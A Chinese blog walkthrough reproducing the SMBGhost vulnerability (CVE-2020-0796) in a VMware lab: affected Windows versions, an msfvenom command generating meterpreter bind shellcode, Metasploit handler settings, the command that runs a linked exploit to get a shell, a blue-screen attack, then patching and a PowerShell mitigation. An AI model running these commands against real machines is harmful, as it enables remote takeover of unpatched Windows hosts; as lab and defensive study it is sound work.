CVE-­2020­-0796(永恒之黑)漏洞复现Getshell

MySQL数据库从入门到实战应用


CVE-­2020­-0796

Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。

受影响的系统版本

适用于32位系统的Windows 10版本1903
Windows 10 1903版(用于基于x64的系统)
Windows 10 1903版(用于基于ARM64的系统)
Windows Server 1903版(服务器核心安装)
适用于32位系统的Windows 10版本1909
Windows 10版本1909(用于基于x64的系统)
Windows 10 1909版(用于基于ARM64的系统)
Windows Server版本1909(服务器核心安装)

环境搭建

我用的是VMware搭建
在这里插入图片描述
环境版本信息
在这里插入图片描述

漏洞检测-扫描

工具下载:
CSDN
GitHub
在这里插入图片描述

漏洞复现-返回会话

工具下载:
CSDN
GItHub
该Exp使用python3
1.启动msf
使用msf生成shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

在这里插入图片描述
执行该命令后会在桌面生成一个shellcode.txt
将生成的shellcode替换exp中的exploit.py中的USER_PAYLOAD保存即可。在这里插入图片描述
2.使用kaili中的msf开启监听

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp #设置反弹模式
msf5 exploit(multi/handler) > set rhost 172.18.9.24
msf5 exploit(multi/handler) > set lport 3333 #设置监听端口 端口需与上面生成的shellcode一致
msf5 exploit(multi/handler) > run
在这里插入图片描述
3.在kali Exp文件夹下执行
python3 exploit.py -ip 172.18.9.24
在这里插入图片描述
4.获得会话 复现成功在这里插入图片描述在这里插入图片描述
在这里插入图片描述

漏洞复现-蓝屏攻击

工具下载
CSDN
在这里插入图片描述
目标主机蓝屏
在这里插入图片描述

视频演示

Getshell
https://www.bilibili.com/video/BV1ZK4y1x7JL/

漏洞修复

下载补丁并安装补丁链接
也可以使用PowerShell命令禁用SMBv3服务的压缩
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” DisableCompression -Type DWORD -Value 1 –Force

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章